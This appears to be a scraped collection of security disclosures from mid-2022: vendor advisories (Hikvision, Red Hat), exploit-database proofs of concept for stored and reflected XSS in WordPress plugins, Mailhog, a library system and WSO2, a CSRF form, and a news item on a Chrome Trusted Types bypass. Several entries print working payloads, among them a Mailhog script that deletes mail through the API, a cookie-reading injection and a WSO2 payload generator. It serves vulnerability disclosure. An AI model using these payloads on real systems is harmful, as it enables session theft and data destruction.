The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to XSS attack by sending messages with malicious commands to the affected device.

**SN No.** HSRC-202206-01

**Edit:** Hikvision Security Response Center (HSRC)

**Initial Release Date:** 2022-06-23

**Summary**

The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerabilities:

1) Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device. 

2) Due to the insufficient input validation, attacker can exploit the vulnerability to XSS attack by sending messages with malicious commands to the affected device.

**CVE ID**

CVE-2022-28171

CVE-2022-28172

**Scoring**

CVSS v3 is adopted in this vulnerability scoring. 

(http://www.first.org/cvss/specification-document)

CVE-2022-28171

Base score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

Temporal score: 6.7 (/E:P/RL:O/RC:C)

CVE-2022-28172

Base score: 6.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N)

Temporal score: 5.9 (E:P/RL:O/RC:C)

**Affected Versions and Fixes**

**Product Name**

**Affected Versions**

DS-A71024/48/72R

Versions below V2.3.8-6 (including V2.3.8-6)

DS-A80624S

DS-A81016S

DS-A72024/72R

DS-A80316S

DS-A82024D

DS-A71024/48R-CVS

Versions below V1.1.4 (including V1.1.4)

DS-A72024/48R-CVS

**Precondition**

The attacker has network access to the device.

**Attack Step**

Send a specially crafted malicious message.

**Obtaining Fixed Versions**

Users can download patches/updates on the Hikvision official website (Click here) to mitigate these vulnerabilities. 

**Source of vulnerability information:**

This vulnerability is reported to HSRC by independent security researcher Thurein Soe.

**Contact Us**

To report any security issues or vulnerabilities in Hikvision products and solutions, please contact Hikvision Security Response Center at hsrc@hikvision.com.

Hikvision would like to thank all the security researchers who help identify and mitigate potential vulnerabilities in our products to ensure that our solutions protect people, places, and assets while user data is safeguarded. 

**Check out the Partner Letter to get more information >>**

CVE-2022-28172: Security Vulnerability in Some Hikvision Hybrid SAN Products

WordPress Simple Page Transition plugin version 1.4.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin ‘Simple Page Transition’  - Stored CrossSite Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/simple-page-transition/# Version: 1.4.1# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Vulnerable code*:```<label for="simple_page_transition_ignored"><?php _e( 'Ignored DownloadLinks', 'spt' ); ?></label><br /><input type="text" id="simple_page_transition_ignored"name="simple_page_transition_ignored" value="*<?php print$simple_page_transition_ignored; ?>*" /><br />```*#POC:*1- Install the plugin ‘simple page transition’ & activate it.2- Navigate towards the “ignored download links”3- Enter the XSS payload ` *“><img src=x onerror=alert(1)>*`*#POC image:*https://imgur.com/yzaTkhi

WordPress Simple Page Transition 1.4.1 Cross Site Scripting

Mailhog version 1.0.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)# Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500)# Date: 06.18.2022# Exploit Author: Vulnz# Vendor Homepage: https://github.com/mailhog/MailHog# Software Link: https://github.com/mailhog/MailHog# Version: 1.0.1# Tested on: Windows,Linux,Docker# CVE : N/AExplanation:Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including  email deletion, sending, reading or any other call.Steps to reproduce:   1.   Create malicious attachment with payloads stated below   2.   Attach malicious file to email with payload (XSS)   3.   Send email   4.   Wait for victim to open email   5.   Receive data, get control of victim browser using Beef framework, or manipulate with API dataProof of Concept:<script>var XMLHttpFactories = [function () {    return new XMLHttpRequest()},function () {    return new ActiveXObject("Msxml2.XMLHTTP")},function () {    return new ActiveXObject("Msxml3.XMLHTTP")},function () {    return new ActiveXObject("Microsoft.XMLHTTP")}];function createXMLHTTPObject() {    var xmlhttp = false;    for (var i=0;i<XMLHttpFactories.length;i++) {        try {            xmlhttp = XMLHttpFactories[i]();        }        catch (e) {            continue;        }        break;    }    return xmlhttp;}var xhr = createXMLHTTPObject();xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true);xhr.onreadystatechange = function(){    if (xhr.readyState == 4)        alert("Request completed, with the following status code: " +xhr.status);}xhr.send("");</script>

Mailhog 1.0.1 Cross Site Scripting

WordPress W-DALIL plugin version 2.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: WordPress Plugin W-DALIL  - Stored Cross Site Scripting# Date: 27-06-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/w-dalil/# Version: 2.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com#Vulnerable Code:```<input class="dalil_input" name="dalil-address" type="text"placeholder="<?php echo __('Dalil item address','w-dalil'); ?>"value="<?php echo $dalil_information['dalil-address']; ?>"  />```#Steps To Reproduce :1 - First Install the plugin  "*w-dalil*" and activate it.2 - Go to Dalil —> Add New Dalil item3 - Inside the “*Dalil item address*” enter XSS payload “*><img src=xonerror=alert(1)>*" and hit enter.#Poc Image :https://imgur.com/JPG97oh

WordPress W-DALIL 2.0 Cross Site Scripting

Red Hat Security Advisory 2022-5187-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5187-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5187  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3 on OpenShift  
4.6.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYStzjgjWX9erEAQhr7BAAgkwBXxlhZvhp+y0mChTHSRpCDWIFv5CK  
CQc1Otk7kyhpeDftCLr6hNY/jcWRb3GtyuYd+vAVAkATAyG5ZueNND+k2V+k1QHW  
+b0ZdyjkRkAmH4qsCayCa1Y0T8smn7BKq83NbQY4staEBz7hHF5dj8UZ2mvQ5RPl  
g2mnu6p2ZPfmKYQ0hLjQgKf0L4y1U5OKIWOoqJlcjIYbb6AjEMIsHe2zSga/t4Ko  
u44FZO10E665conWWlqI0rMr+k8joiQap1//FxMad9pJv0Cs9Y/WNThsryHbNsiF  
cZKUDO2DDQClegtRqTeVG/s6pg1E7IlvxpbzI8288ZSOB/kb5LioTJ8Rb2RIbnd/  
TtYBkDPDds5HnaNHVIpniyBtz8e2rd/knfkEfDh9eM5qIBOdsM5DBbRUN3ommYaV  
HgNxO+UGHa4QaFX1QPz65sjqe8ntjPq8jZWR9KF2gSmPoU1YkbVpQNfV37emCSrS  
WG2Y3LdWsMgcPGj7Dq6dV5tIcowiygHHjo1NF3A4XFFB13zm/RLQEvVwL3k1t07G  
QbWVqZ6DYIyBswIh9L408M5ydw8JVmzxCuwBqLv1K+mprTUvvFo63IMJYWOxPLvj  
x9i+AQ9e5NQsDFSXOUTVyVnZuaAjBPoC8bk2xvH/OuS0Uo5M2bBIFX6h5IF6PVlT  
+y9QAGpBsqc=  
=WK5w  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5187-01

Library Management System with QR Code version 1.0 suffers from a persistent cross site scripting vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 StoredCross-Site Scripting#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md#### Description：#### Library Management System with QR code Attendance is vulnerable toStored cross-site scripting on the profile edit page. The "Name" parameterin 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.#### Impact: An attacker could steal cookies with a crafted URL sent to the victims.### POC```POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1Host: localhostContent-Length: 115Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/admin/edit_admin_details.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: closeName=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=```

Library Management System With QR Code 1.0 Cross Site Scripting

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

    # Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

WSO2 Management Console Cross Site Scripting

Red Hat Security Advisory 2022-5192-01 - Red Hat Openshift GitOps is a declarative way to implement continuous deployment for cloud native applications. Issues addressed include a cross site scripting vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2022:5192-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5192  
Issue date:        2022-06-24  
CVE Names:         CVE-2018-25032 CVE-2022-1271 CVE-2022-31016   
                   CVE-2022-31034 CVE-2022-31035 CVE-2022-31036   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.3.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat Openshift GitOps is a declarative way to implement continuous  
deployment for cloud native applications.

Security Fix(es):

* argocd: vulnerable to a variety of attacks when an SSO login is initiated  
from the Argo CD CLI or the UI. (CVE-2022-31034)

* argocd: cross-site scripting (XSS) allow a malicious user to inject a  
javascript link in the UI (CVE-2022-31035)

* argocd: vulnerable to an uncontrolled memory consumption bug  
(CVE-2022-31016)

* argocd: vulnerable to a symlink following bug allowing a malicious user  
with repository write access (CVE-2022-31036)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2096278 - CVE-2022-31035 argocd: cross-site scripting (XSS) allow a malicious user to inject a javascript link in the UI  
2096282 - CVE-2022-31034 argocd: vulnerable to a variety of attacks when an SSO login is initiated from the Argo CD CLI or the UI.  
2096283 - CVE-2022-31016 argocd: vulnerable to an uncontrolled memory consumption bug  
2096291 - CVE-2022-31036 argocd: vulnerable to a symlink following bug allowing a malicious user with repository write access

5. References:

https://access.redhat.com/security/cve/CVE-2018-25032  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-31016  
https://access.redhat.com/security/cve/CVE-2022-31034  
https://access.redhat.com/security/cve/CVE-2022-31035  
https://access.redhat.com/security/cve/CVE-2022-31036  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYrZYPdzjgjWX9erEAQjrKg//fhNsc37/PGObQ+ILtKev6tbnelvEZXen  
q4eqQw+qbj2BXJyBVudmB1yrnMYc5ZcQViuQwAbhFafexFR5b6UjGr+g8x+5lSIq  
o/RBisD/Ob7/uavZua+ZzRutE3ER/f5YVK86AvK5cbk8hAlTtL0UN7RlFictYW+0  
hld0OyTXKUioPgwjZagQX7fhcyAKJsMIpnG8jZfygSsDje0fIDAHsyPfPGVWibUM  
1mRE9x618hFD+Dml70BpXE5X2CTnyfIQbWtPmR3KX5muhnh64zpNk3jGHhtjIqI9  
zT7CLR8o5Dvr6/n+HLT4WjPmfLiX2Hbo7fe4e4y2xdfkjDXPw4HoLr9ZF30FplG1  
eMhXCBWqyGYcYWh77lZlFLLQaz/ZE5pf7DxqwGzWBUUVrBFEJ+bIQKjB/y6WavnC  
rxCboZoqRifcvyKM1mDUcBK9YO14j9GXwb2Xu1IK7Z92RXZzZxIyRmJNRZDMzGF9  
uWxqBXbuSF/eRQFrRhJn8aeVzzxPMiqe/nRa1JsXJdMD8gyefVPloAVeRNx/0EbO  
4CpG2IGmQevfFx+E1ADM0X72TE0Bm1nzTSEd6D4i2DiA/NyYo2Ape3In9lHg8qYV  
XtcXBwBe14OJca+iAYTr3hMF/xzrCtfGd/lyf4ikQUMDWaNi2ixzA28MejDFJ0yl  
8b5s087AQwk=  
=FmJg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5192-01

WordPress Plugin UK Cookie is prone to a cross-site request forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application; other attacks are also possible. WordPress Plugin UK Cookie version 1.1 is vulnerable; other versions may also be affected.

There is CSRF security vulnerability in uk-cookie plugin version 1.1 and using it attacker can insert XSS to front page of WordPress installation. Version 1.1 is the latest (checked 2013-06-06) and I did not test older versions.

    <html>
    <body>
    <form action="https://example.com/wp-admin/options.php" method="POST">
    <input type="hidden" name="option&#95;page" value="cookie&#95;plugin&#95;options" />
    <input type="hidden" name="action" value="update" />
    <input type="hidden" name="&#95;wpnonce" value="e909307b13" />
    <input type="hidden" name="&#95;wp&#95;http&#95;referer" value="&#47;wp&#47;wp&#45;admin&#47;options&#45;general&#46;php&#63;page&#61;cookie&#45;alarm&#45;page&amp;settings&#45;updated&#61;true" />
    <input type="hidden" name="cookiewarn&#95;options&#91;warn&#95;text&#93;" value="&lt;script&gt;alert&#40;&apos;hacked&apos;&#41;&lt;&#47;script&gt;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;redirect&#93;" value="https&#58;&#47;&#47;github&#46;com&#47;wpscanteam&#47;wpscan&#47;" />
    <input type="hidden" name="cookiewarn&#95;options&#91;ok&#95;text&#93;" value="Yes" />
    <input type="hidden" name="cookiewarn&#95;options&#91;notok&#95;text&#93;" value="No" />
    <input type="submit" value="Submit form" />
    </form>
    </body>
    </html>

CVE-2013-2180: CVE-2012-5856 uk-cookie plugin XSS · Issue #184 · wpscanteam/wpscan

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

John Leyden 27 June 2022 at 15:25 UTC

Flaws in protection mechanism leaves websites more exposed to DOM XSS-based attacks

Security researchers have uncovered multiple unprotected properties to bypass Trusted Types, a widely used web security mechanism, in some scenarios.

Trusted Types is an important technology that allows websites to define strict rules on handling various DOM (Document Object Model) properties, a useful technique in guarding against DOM-based cross-site scripting (XSS) attacks.

A bypass discovered by well-known researcher Masato Kinugawa uses attribute properties to bypass the protection that Trusted Types would normally offer.

If a site was to use these properties and was vulnerable to DOM XSS then Trusted Types would not protect it, Kinugawa found. If a site modified an existing attribute value via nodeValue/textContent, as explained in a post on a Chrome security mailing list, then Trusted Types would ignore the assignment completely.

Catch up on the latest browser-related security news and analysis

The vulnerability was demonstrated in Chrome v100.0.4892.0 (Official Build) canary (64-bit). Other versions of Chrome and other browsers may be vulnerable, but this has not been tested.

The latest versions of Chrome address the problem.

The vulnerability – tracked as CVE-2022-1494 and said to involve “insufficient data validation in Trusted Types” – was first reported on February 16 but details were only publicly released last week.

The Daily Swig contacted both Kinugawa and Krzysztof Kotowicz, the Google software engineer who created Trusted Types, for comment. No word back, as yet, but we’ll update this story as and when more information comes to hand.

RELATED Google checks rise of DOM XSS with Trusted Types

Tag

#xss